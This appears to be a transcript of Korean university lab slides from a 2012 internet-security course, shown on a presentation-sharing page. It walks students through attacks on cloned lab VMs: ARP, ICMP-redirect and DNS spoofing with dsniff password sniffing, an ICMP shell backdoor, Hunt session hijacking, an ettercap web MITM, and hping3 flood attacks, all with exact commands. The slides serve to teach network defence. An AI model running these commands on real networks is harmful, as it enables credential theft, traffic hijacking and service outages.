인터넷보안 실습 2012년 1학기.

Slides:



Advertisements
Similar presentations
충북대 네트워크 보안 연구실 [ gmail.com ] 정보 보호 응용 11. 해킹기술 (3) 11. 해킹기술 (3) - hacking & security -
Advertisements

1 장 Unix/Linux 소개 1 Helpers. 1 장 내용 1. 왜 유닉스인가 ? 2. 유닉스 시스템 구조 3. 유닉스 역사 및 버전 4. 리눅스 설치 ( 별도 2 시간 실습 ) 5. 사용 환경 6. 사용자 계정 관리 Unix/Linux 2.
8 스니핑.
10 터널링.
조준희 (Cho, Junhee) TCP/IP 조준희 (Cho, Junhee)
네트워크해킹 분석 및 대응 한국정보보호교육센터 서 광 석 원장.
Distributed and Cloud Computing Lab. Embedded System Software 개발 환경 설정 Dept. of Computer Science and Engineering Sogang University, Seoul, KOREA 1.
개발 환경 설치 Embedded System Software
Chapter 03. 네트워크 보안 : 길을 지배하려는 자에 대한 저항
임베디드 시스템 개발 환경 (1) Lecture #3.
(개정판) 뇌를 자극하는 Red Hat Fedora 리눅스 서버 & 네트워크
1. 스푸핑 공격 - 스푸핑(Spoofing): ‘속이다’ 의 의미.
공격/대응 Examples.
PXA270 개발환경 설정 Ubuntu 실습용.
11. 해킹기술 (4) - hacking & security -
☞ 컴퓨터 관리하는 방법 컴퓨터 미 사용시 반드시 컴퓨터 끄기를 한다.
Linux LVS Tutorial Austin.
Introduction to Networking
Minicom,tftp,nfs설정,vnc설정
10. About TCP / IP SPARCS 08 우성필.
Chapter 09 세션 하이재킹.
Tftp, nfs, samba 실습 임베디드 시스템 I.
네트워크 보안 TCP/IP 네트워크통신 개념.
Chapter 02 네트워크에 대한 이해.
Hping을 이용한 공격기법과 패킷분석 중부대학교 정보보호학과 심 규 열, 정 성 윤.
18. HTTP 보안 -dsniff 실시간 정보 시스템 LAB 이 영 주 RTIS LAB.
(개정판) 뇌를 자극하는 Red Hat Fedora 리눅스 서버 & 네트워크
Part 06 보안 1. Windows 보안 2. Linux 보안 3. 해킹 기술 4. 네트워크 장비 보안 5. 해킹 도구.
NAC Test 시나리오 내부단말 통제 보안 BMT 시나리오
Chapter 06 스니핑.
11. 해킹기술 (2) - hacking & security -
국산 Firewall 제품 비교표 SecureShield SecureWorks InterGuard Hwarang
임베디드 시스템 개론 3주차 Embedded System..
운 영 체 제 실 습 6. 네트워크 관리.
자바 5.0 프로그래밍.
리눅스 명령어 실습 임베디드 시스템 I.
AOE-212N 설치 Easy Manual INTER-M C/S팀 길근우.
Processing resulting output
Network Security Footprint & Scan.
시스템 보안 백 도 어 학번: 이름: 김 준 일.
리눅스 기본 명령어 기본 명령어 명령어 기능 사 용 예 date 날짜 및 시간을 확인하고 생성.
침입탐지시스템과 정보보안 안
메일서버 구축 김현지.
11 세션 하이재킹.
시스템 운영계획 통신 케이블 제작 엑세스 포인트, 스위치, 라우터 설치 및 환경구성
실시간 자원 량 정보 제공을 결합한 Heartbeat
DoS와 DDoS 공격 DOS와 DDOS 공격의 이해 DOS 공격의 이해 DDOS 공격의 이해 한빛미디어(주)
(개정판) 뇌를 자극하는 Red Hat Fedora 리눅스 서버 & 네트워크
Virtualbox static ip 설정
Day-19(Tue_10.02) 이론적인 배경 Hypervisor(Type1) : 물리적인 자원을 추상화해서 관리해줌
WireShark 와 Cain & Abel을 이용한 네트워크 해킹
「 LINUX IBM SpectrumScale 설치 가이드」
Wireshark Protocol 분석 지정석 김도건 박재영
멀티 쓰레드 기반의 채팅 프로그램 문성영 김현진 학번 이름 장용하 차희진 연구제안서.
1 학습 목표 네트워크의 기초 네트워크 관련 기초 용어를 익힌다.
9 스푸핑.
8 네트워크 계층 프로토콜 학습 목표 IPv6의 필요성과 헤더 구조를 이해한다. 이동 IP 프로토콜의 터널링 원리를 이해한다.
프린터 서버 최재우.
TCP/IP 인터네트워킹 INTERNETWORKING with TCP/IP <vol
9 스푸핑.
3부 해킹 전 정보 획득 Chapter 9. IP 주소 추적
Web Server Install.
매물장 로그인 직원을 미리 생성하시면 직원 ID로 로그인 가능.
소리가 작으면 이어폰 사용 권장!.
임베디드 리눅스 설치 및 동작 Lecture #5.
Eclipse를 이용한 Embedded Linux 응용 프로그램 개발
소리가 작으면 이어폰 사용 권장!.
Ethereal 컴퓨터 통신망.
라즈베리파이를 활용한 NAS 만들기.
네트워크는 각종 공격들의 위협(Threat)을 받고 있다.
Presentation transcript:

인터넷보안 실습 2012년 1학기

환경설정 -1 1. VMPlayer 4.0.3 설치 2. Fedora 12 설치 Vmware tool for Linux 설치하지 않도록 주의 2. Fedora 12 설치 3. gcc 설치: yum install gcc 4. 프로그램 설치 소스설치 : fragrouter Yum 설치: dsniff, hunt tar zxvf fragrouter-….. cd fragrouter… ./configure make yum install dsniff yum install hunt

환경설정 -2 5. 컴퓨터를 3대로 복제 반드시 power off 후 복제 내문서에서 폴더 복사 폴더이름 변경: server, client, attacker Vmplayer에서 복사된 컴퓨터 열기 메모리 설정: 256MB 컴퓨터이름 설정

실습 8-5. ARP스푸핑 외부 텔넷서버 접속 공격자에게 패스워드 탈취 Ifconfig eth0 promisc 라우터 192.168.18.2 클라이언트 192.168.18.129 61.81.109.10 외부 텔넷서버 접속 공격자에게 패스워드 탈취 공격자 192.168.18.128 Ifconfig eth0 promisc 터미널 1: ./fragrouter –B1 (패킷릴레이) 터미널 2: dsniff (텔넷 스니핑) 터미널 3: Arpspoof –I eth0 –t 192.168.18.129 192.168.18.2 (공격대상 IP) (라우터 IP) 공격대상 클라이언트(129)에게 라우터(2)의 맥주소가 공격자컴퓨터(128)의 맥주소라고 허위 광고하는 ARP 메시지를 계속 보냄

실습 8-6. ICMP 리다이렉트 외부 텔넷서버 접속 공격자에게 패스워드 탈취 라우터 192.168.18.2 클라이언트 192.168.18.129 61.81.109.10 외부 텔넷서버 접속 공격자에게 패스워드 탈취 공격자 192.168.18.128 Ifconfig eth0 promisc 터미널 1: ./fragrouter –B1 (패킷릴레이) 터미널 2: dsniff (텔넷 스니핑) 터미널 3: icmp_redir.c 컴파일 ./icmp_redir 192.168.18.2 192.168.18.129 외부서버IP 192.168.18.128 (게이트웨이) (공격대상IP) (외부서버IP) (공격자IP) 공격대상 클라이언트(129)에게 특정 외부서버에 접속시에는 공격자컴퓨터(128)가 라우터(2)라고 허위광고하는 ICMP redirect 메시지를 계속 보냄

실습 8-8. 스니퍼 찾아보기 Hunt 설치 Hunt 실행 Yum install hunt U) host up test Start IP addr End IP addr Host up test (arp method) Host up test (ping method) Net ifc promisc test (arp method) 임의의 맥주소 입력 Net ifc promisc test (ping method) 임의의 맥주소 입력

실습 9-2. Fake 이용한 스푸핑 텔넷서버 접속 공격자에게 패스워드 탈취 192.168.18.130 클라이언트 192.168.18.129 telnet-server 설치 /etc/xinet.d/telnet 설정 변경 Service xinetd start 방화벽 23번 포트 허용 텔넷서버 접속 공격자에게 패스워드 탈취 공격자 192.168.18.128 Fake 설치 : rpm –Uvh fake-…. (send_arp 명령 가능) 공격자는 서버와 클라이언트에게 ping을 하고 arp –a로 맥주소 확인 공격자는 ifconfig 로 자신의 맥주소 확인 터미널 1: ./fragrouter –B1 (패킷릴레이) 터미널 2: dsniff (텔넷 스니핑) 터미널 3: send_arp 서버IP 공격자MAC 클라이언트IP 클라이언트MAC 공격자의 맥주소를 서버의 맥주소라고 허위 arp 메시지를 보내서 클라이언트를 속임

실습 9-3. DNS 스푸핑 외부 웹서버 접속 시도 공격자가 위조된 IP주소 전달 위조된 사이트로 접속 라우터 192.168.18.2 클라이언트 192.168.18.129 외부 웹서버 접속 시도 공격자가 위조된 IP주소 전달 위조된 사이트로 접속 공격자 192.168.18.128 Vi /etc/dsniff/dnsspoof.hosts 위조된 사이트 등록 (예: 61.81.105.13 *.naver.com ) 터미널 1: ./fragrouter –B1 (패킷릴레이) 터미널 2: arpspoof -t 192.168.18.129 192.168.18.2 (공격자시스템을 라우터라고 광고) 터미널 3: dnsspoof –i eth0 -f /etc/dsniff/dnsspoof.hosts (위조된 IP주소 전달)

실습 10-2. SSH 터널링 Putty 설치 SSH 설치 Putty에서 터널링 설정 - 포워드될 포트 추가 윈도우 SSH 서버 페도라 리눅스 Putty 설치 SSH 설치 Putty에서 터널링 설정 - 포워드될 포트 추가 Putty로 SSH 접속 익스플로러에서 인터넷옵션 선택 - 인터넷옵션/연결/LAN설정/고급/프록시설정 익스플로러로 웹사이트 접속 Wireshark로 패킷 분석 - http 패킷이 사용되지 않고 ssh 패킷으로 터널링되어 웹사이트 접속됨

실습 10-3. 셸 백도어 은닉채널 Ish 설치 서버에 접속 ./ish 서버주소 Ish 설치 데몬 실행 ./ishd 클라이언트 페도라리눅스 서버 페도라 리눅스 Ish 설치 서버에 접속 ./ish 서버주소 Ish 설치 데몬 실행 ./ishd Wireshark로 패킷분석 - ICMP 패킷을 이용하여 텔넷 이용 가능

실습 11-1. Hunt를 이용한 세션하이재킹 1) 미리 텔넷서버 접속. 로그인. 3) 공격자에게 세션 탈취당함 192.168.18.130 클라이언트 192.168.18.129 1) 미리 텔넷서버 접속. 로그인. 3) 공격자에게 세션 탈취당함 - 공격자는 로그인 없이 접속 - 클라이언트의 접속을 차단 공격자 192.168.18.128 2) Hunt 실행 d) daemons rst/arp/sniff/mac a) arp spoof + arp relayer daemon a) add host to host arp spoof 서버 IP 주소 등록 (임의 맥주소) 클라이언트 IP 주소 등록 (임의 맥주소) refresh 간격: 2 x x 최상위메뉴 l) list/watch/reset connections (세션탐지) a) arp/simple hijack (그림 11-11 참조) ctrl+c 로 세션 하이재킹

실습 11-2. 웹 MITM 공격 클라이언트가 외부 웹서버를 사용할때 내부웹서버를 일부 참조하도록 변조 외부 웹서버 내부웹서버 192.168.18.130 공격자 192.168.18.128 클라이언트 192.168.18.129 (1) 내부웹서버 설정 yum install httpd service httpd start 방화벽에서 http 허용 그림파일을 /var/www/html/에 저장 (2) 공격자 설정 1. Ettercap 설치 yum install ettercap 2. Etterfilter 설정 vi filter.txt (그림 11-19) 3. Etterfilter 컴파일 etterfilter –o filter.ef filter.txt 4. MITM 공격 수행 ettercap –T –q –F filter.ef –M ARP /192.168.18.129/ // 웹문서의 모든 그림을 내부웹서버에 있는 그림으로 대체 (3) 클라이언트의 웹서핑 웹문서의 그림이 모두 변조되어 출력

실습 13-1. Ping of Death Hping3 설치 yum install hping3 터미널: tcpdump –Xx 공격자 192.168.18.128 서버 192.168.18.130 Hping3 설치 yum install hping3 터미널: tcpdump –Xx System monitor / resource 동작 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 Ping of death 공격 실시 hping3 -- icmp --rand-source 192.168.18.130 –d 65000 --flood 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰 호스트윈도우 Ping of death 공격 실시 ping –n 100 –l 65000 192.168.18.130

실습 13-2. SYN Flooding Hping3 설치 yum install hping3 웹서버 설치 공격자 192.168.18.128 서버 192.168.18.130 Hping3 설치 yum install hping3 웹서버 설치 yum install httpd 웹서버 시작 service httpd start 방화벽 http 허용 터미널1: tcpdump –Xx System monitor / resource 동작 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 터미널2: netstat –an | grep tcp 관찰 SYN Flooding 공격 실시 hping --rand-source 192.168.18.130 –p 80 –S --flood 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰

실습 13-3. Bonk, Boink 공격 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx 공격자 192.168.18.128 서버 192.168.18.130 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx System monitor / resource 동작 터미널 1 hping –a 200.200.200.200 192.168.18.130 --id 3200 --O 12345 -M 34343 -p 21 -d 320 --flood 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 터미널 2 hping –a 200.200.200.200 192.168.18.130 --id 3200 --O 12343 -M 34343 -p 21 -d 320 --flood 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰

실습 13-4. Land 공격 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx 공격자 192.168.18.128 서버 192.168.18.130 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx System monitor / resource 동작 hping 192.168.18.130 -a 192.168.18.130 --icmp --flood 목적지와 송신지 주소를 모두 서버의 주소로 입력 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰

실습 13-5. Smurf 공격 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx 공격자 192.168.18.128 서버 192.168.18.130 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx System monitor / resource 동작 hping 192.168.18.255 -a 192.168.18.130 --icmp --flood 전체 네트워크에 공격대상시스템인 서버주소로 ping 응답을 보내도록 명령 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 hping 10.24.0.255 -a 192.168.18.130 --icmp --flood 전체 네트워크에 공격대상시스템인 서버주소로 ping 응답을 보내도록 명령 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰